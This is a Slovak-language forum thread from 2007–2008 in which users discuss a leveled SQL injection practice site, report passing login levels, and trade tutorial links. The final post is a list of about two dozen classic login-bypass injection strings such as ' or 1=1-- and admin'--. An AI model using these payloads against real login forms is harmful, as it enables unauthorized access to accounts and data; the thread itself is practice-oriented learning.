SQL injection

turtlak69

prejavte svoje vedomosti o sql a skuste sa dostat do systemu

taka mala simulacia je na stranke http://flack.security-portal.cz a je to oznacene podla levelu zabezpecenia. pochvalte sa do ktoreho levelu ste sa dostali

edit: presiel som prvy level. vypis:

Logged in as: babayaga

edit2: presiel som aj druhy tym istym sposobom ako prvy

treti sa mi nedari, ale zajtra to skusim

rEnEeK

1. Level

Logged in as: babayaga
Now try to log in with another user, or just head for the next level.

/login/level1/index.php

2. Level

Logged in as: babayaga
Now try to log in with another user, or just head for the next level.

/login/level2/index.php

Príspevok od používateľa **ppt** » 25 okt 2007, 17:02

Dajte please navod. Skusal som totiz podla viacerych navodov testovat bezpecnost mojich stranok, no ani raz sa mi nepodarilo prihlasit pod mojim loginom (pritom viem, ze proti sql injection som nepouzil ziadnu ochranu). Asi som dost lama, ked sa mi to pomocou navodov nepodarilo.

turtlak69

na tej stranke mas aj "tutorialy"

staci kliknut tam hore.

de1x1ter

som zaciatocnik niejaky postup a tak ...? pokim to prelozim z en

xivo · Príspevok od používateľa **xivo** » 05 okt 2008, 1:36

de1x1ter napísal:som zaciatocnik niejaky postup a tak ...? pokim to prelozim z en

Mne sa celkom pozdaval pX-ov SQL Injection test
nejedna sa len o OR 1=1, ale nic zlozite na tom nieje

Kód: Vybrať všetko

http://blog.monogram.sk/pokojny/2008/02/18/cvicenie-na-sql-injection/

//IMHO uc sa sam ... a najlepsie z tutorialov, nik ti tu nebude vraviet co a ako ... treba na to nervy, ale ked sa aspon daco podari, ten pocit stoji za to

asopn na cjvilku

aaaa · Príspevok od používateľa **aaaa** » 08 okt 2008, 17:06

Kód: Vybrať všetko

admin'/*
admin'--
' or ''='
' or ''=' or '1'='1
') or (1)=(1) --
') or ('1'='1 --
') or '1'='1 --
'or a=a--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a